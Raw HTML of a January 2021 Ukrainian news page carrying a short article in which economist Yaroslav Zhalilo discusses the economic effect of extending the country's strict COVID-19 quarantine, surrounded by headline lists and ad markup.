href="https://enovosty.com/news-auto/full/1301-pod-kievom-zasekli-neobychnyj-yaponskij-vnedorozhnik-foto">Под Киевом засекли необычный японский внедорожник (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831899"> <span class="postDate">06:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-kiberpoliciya-blokirovala-moshhnuyu-kontrabandu-zapreshhennyx-lekarstvennyx-sredstv">Киберполиция блокировала мощную контрабанду запрещенных лекарственных средств</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831897"> <span class="postDate">06:28</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1301-v-stolice-zametili-shikarnyj-porsche-911-foto">В столице заметили шикарный Porsche 911 (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831895"> <span class="postDate">06:02</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-minkulte-rasskazali-o-vozmozhnosti-prodleniya-karantina">В Минкульте рассказали о возможности продления карантина</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>12.01.2021 г.</span><br /><div class="post_news"> <span id="post-4831875"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1201-na-ukrainu-nadvigaetsya-ciklon">На Украину надвигается циклон: синоптики прогнозируют ухудшение погоды</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831826"> <span class="postDate">22:55</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1201-vrachi-rasskazali-kak-prijti-v-normu-posle-covid-19">Врачи рассказали, как прийти в норму после COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831840"> <span class="postDate">22:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1201-mediki-obyasnili-pochemu-maski-nuzhno-nosit-dazhe-tem-kto-perenes-covid-19">Медики объяснили, почему маски нужно носить даже тем, кто перенес COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831829"> <span class="postDate">21:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1201-polzovatelej-seti-porazil-neveroyatnyj-vosxod-solnca-nad-morem-v-berdyanske-foto">Пользователей Сети поразил невероятный восход солнца над морем в Украине (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831889"> <span class="postDate">21:39</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1201-top-10-samyx-opasnyx-epidemij-v-istorii-chelovechestva">Топ-10 самых опасных эпидемий в истории человечества</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831822"> <span class="postDate">20:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1201-pyat-let-v-istorii-kotorye-okazalis-eshhe-xuzhe-chem-2020-god">Пять лет в истории, которые оказались еще сложнее чем 2020 год</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831888"> <span class="postDate">19:15</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1201-grechnevaya-kasha-mozhet-mozhet-byt-opasnoj-komu-nelzya-eyo-est">Гречневая каша может может быть опасной: кому нельзя её есть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831887"> <span class="postDate">19:03</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1201-yadernaya-vojna-smogut-li-morya-prokormit-chelovechestvo-smi">Ядерная война: Смогут ли моря прокормить человечество? - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831886"> <span class="postDate">18:58</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1201-neadekvatnyj-voditel-iz-zaporozhya-proryvayas-v-krym-dzhipom-protaranil-kontrolnyj-punkt">Неадекватный водитель из Запорожья, прорываясь в Крым, джипом протаранил контрольный пункт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831883"> <span class="postDate">17:39</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1201-ceny-na-kvartiry-v-kieve-probili-novuyu-otmetku-skolko-sejchas-stoit-zhile-v-stolice">Цены на квартиры в Киеве пробили новую отметку. Сколько сейчас стоит жилье в столице?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831881"> <span class="postDate">17:12</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1201-zelenskij-priglasil-ilona-maska-v-zhitomir">Зеленский пригласил Илона Маска в Житомир</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831879"> <span class="postDate">15:43</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1201-tramp-podgotovil-eshhyo-paru-syurprizov-administracii-bajdena-ekspert">Трамп подготовил ещё пару сюрпризов администрации Байдена, - эксперт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4831876"> <span class="postDate">15:34</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1201-yakutskij-shaman-vyezzhaet-na-belom-kone-izgonyat-demona-putina-yolkin-pokazal-kak-ego-budut-ostanavlivat">Якутский шаман выезжает "на белом коне" "изгонять демона Путина". Ёлкин показал, как его будут останавливать</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4832047"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_economy">Новости экономики</a> <span>&raquo;</span> Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны</div><time datetime="2021-01-13T20:11:48+02:00"><span id="date">Новости экономики, 20:11:48 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AF%D1%80%D0%BE%D1%81%D0%BB%D0%B0%D0%B2+%D0%96%D0%B0%D0%BB%D0%B8%D0%BB%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%83%D1%81%D0%B8%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BA%D0%B0%D1%80%D0%B0%D0%BD%D1%82%D0%B8%D0%BD%D0%B0+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AF%D1%80%D0%BE%D1%81%D0%BB%D0%B0%D0%B2+%D0%96%D0%B0%D0%BB%D0%B8%D0%BB%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%83%D1%81%D0%B8%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BA%D0%B0%D1%80%D0%B0%D0%BD%D1%82%D0%B8%D0%BD%D0%B0+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4832047" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Министр здравоохранения Украины Максим Степанов настаивает на продлении карантина</b></p> <div class="single_main_image"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="460" height="393" src="https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s-460x393.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s.jpg 460w, https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s-112x96.jpg 112w, https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s-300x256.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div></div> <p>С вопросом относительно влияния продления <a class="tag" href="https://enovosty.com/tag/karantin" target="_blank">карантин</a>а на экономику страны «Экономические Новости» обратились за эксклюзивным комментарием к президенту Центра антикризисных исследований д.э.н. Ярославу Жалило, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p><a class="tag" href="https://enovosty.com/tag/yaroslav-zhalilo" target="_blank">Ярослав Жалило</a> сообщает, что введенный усиленный карантин на экономику сильного влияния не оказывает</p><p>&#171;Но и, к сожалению, скорее всего на распространение заболеваемости также сильного влияния не оказывает. Особенно учитывая, что есть определенные области, которые формально соблюдают карантинные требования. Но вместе с тем, конечно, есть группы бизнеса, которые от введения усиленного карантина серьезно страдают. Это сфера общественного питания, сфера развлечений, объекты размещения и все то, что связано с туристической отраслью. И конечно все те предприятия торговли, деятельность которых приостановлена в усиленный карантин.</p><p>Надо учесть, что это не только юридические лица, но и физические лица-предприниматели. Поэтому количество предприятий, деятельность которых будет приостановлена в случае продления усиленного карантина, достаточно велико. И таким образом, для экономики влияние продления усиленного карантина будет не таким существенным, но по численности предприятий, деятельность которых приостановлена, влияние будет значительным. Мы уже видим протесты, которые были со стороны бизнеса перед тем, как начинался усиленный карантин. И эти протесты показали, что есть достаточно большая социальная масса, которая будет против продления усиленного карантина&#187;, &#8212; сообщает Ярослав Жалило</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_society/full/1301-stalo-izvestno-kakoj-karantin-zhdyot-ukraincev" >Стало известно, какой карантин ждёт украинцев</a></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4832047"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4832047&amp;_wpnonce=deac5d13be"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2021-01-13T20:11:48+02:00"/><meta itemprop="dateModified" content="2021-01-13T20:30:29+02:00"/><meta itemprop="genre" content="Новости экономики"/><meta itemprop="description" content="Министр здравоохранения Украины Максим Степанов настаивает на продлении карантина"/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s-460x393.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s-460x393.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="393"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/karantin" rel="tag">карантин</a>, <a href="https://enovosty.com/tag/yaroslav-zhalilo" rel="tag">Ярослав Жалило</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 35</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AF%D1%80%D0%BE%D1%81%D0%BB%D0%B0%D0%B2+%D0%96%D0%B0%D0%BB%D0%B8%D0%BB%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%83%D1%81%D0%B8%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BA%D0%B0%D1%80%D0%B0%D0%BD%D1%82%D0%B8%D0%BD%D0%B0+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AF%D1%80%D0%BE%D1%81%D0%BB%D0%B0%D0%B2+%D0%96%D0%B0%D0%BB%D0%B8%D0%BB%D0%BE+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%B2%D0%BB%D0%B8%D1%8F%D0%BD%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D0%B4%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F+%D1%83%D1%81%D0%B8%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BA%D0%B0%D1%80%D0%B0%D0%BD%D1%82%D0%B8%D0%BD%D0%B0+%D0%BD%D0%B0+%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D1%83+%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4832047" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="5a0fe22636" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br><br /> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4831384"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/801-novosti-kremlya-putin-opyat-ne-uxodit">Новости Кремля: Путин опять (не) уходит...</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829953"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2612-prognozy-politiko-ekonomicheskoj-zhizni-v-ukraine-na-2021-god-ocenki-ekspertov">Прогноз политико-экономической ситуации в Украине на 2021 год - оценки экспертов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4830585"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3012-itogi-dekabrya-boj-koronavirusu-novaya-denezhnaya-epoxa-i-zagadochnye-anomalii-vselennoj">Итоги декабря: Бой коронавирусу, новая денежная эпоха и загадочные аномалии Вселенной</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4830223"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2812-konvulsii-antonova-vyjdet-li-iz-zatyazhnogo-pike-znamenityj-aviaproizvoditel">Конвульсии "Антонова": Выйдет ли из затяжного пике знаменитый авиапроизводитель?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829492"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2212-itogi-goda-glavnye-sobytiya-uxodyashhego-2020-goda">Итоги года: Главные события уходящего 2020 года</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829530"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2212-ze-cifrovizaciya-i-elektronnaya-slezhka-vas-podslushayut-zapishut-i-prodadut">Зе-цифровизация и электронная слежка: вас подслушают, запишут и продадут</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829069"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/1812-ukroboronprom-k-deribanu-gotov">"Укроборонпром" к дерибану готов?!</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829022"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1812-nasledie-kernesa-chto-zhdet-xarkov-peredel-sfer-vliyaniya-ili-revansh-prorossijskix-sil">Наследие Кернеса: Что ждет Харьков - передел сфер влияния или реванш пророссийских сил</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4828761"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/1612-bolshe-na-silovikov-i-menshe-na-vrachej-kak-raspredelili-gosbyudzhet-2021-i-otkuda-vozmut-dengi">Больше на силовиков и меньше на врачей: как распределили госбюджет 2021 и откуда возьмут деньги</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4828136"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/1112-krax-avtokraza-kak-ubivayut-znamenityj-avtozavod">Крах АвтоКрАЗа: Как убивают знаменитый автозавод</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="zaw-ocifiqifodilibonedana"><script>!(function(w,m){(w[m]||(w[m]=[]))&&w[m].push(
